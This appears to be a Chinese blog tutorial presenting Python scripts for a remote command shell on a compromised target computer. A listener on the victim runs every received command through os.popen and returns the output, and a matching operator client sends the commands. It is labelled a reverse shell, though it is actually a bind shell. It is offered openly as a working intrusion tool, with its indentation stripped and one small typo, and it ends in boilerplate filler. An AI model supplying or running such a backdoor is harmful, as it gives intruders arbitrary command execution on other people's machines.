有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell
主要用到python os库和sokect库
这里的服务端在目标机上运行
from socket import *
from os import *
s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议
s.bind(('',6666))#补丁端口
s.listen(1)#开始监听一个队列
while True:
sock,addr=s.accept()#返回两次 第一次返回连接地址 二 端口号
print ('客户端:',addr)
while True:
cmd=sock.recv(1024)#缓存长度 接收传递过来
cmdstr=cmd.decode()
if cmdstr=='exit':
print ('客户端:',addr,'关闭')
sock.close()
break
result=popen(cmdstr).read()
sock.send(result.encode())
s.close()
本机运行
from socket import *
from os import *
c=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议
c.connect(('127.0.0.1',6666))#连接地址
while True:
cmd=input("cmd:")
c.send(cmd.encode())#必须传递流
if cmd=='exit':
c.close()
break
data=c.recv(1014)
print (data.decode())
总结
以上所述是小编给大家介绍的python模拟菜刀反弹shell绕过限制,希望对大家有所帮助,如果大家有任何疑问欢迎给我留言,小编会及时回复大家的!
到此这篇关于python模拟菜刀反弹shell绕过限制【推荐】就介绍到这了。过好每一天,认真工作,努力学习学他人知识,变自已财富,学他人长处,补自已不足!让自已在众人的眼光里光彩夺目。努力回报给予想要的一切,人生真的太,简单得只要脚踏实地就行!更多相关python模拟菜刀反弹shell绕过限制【推荐】内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!




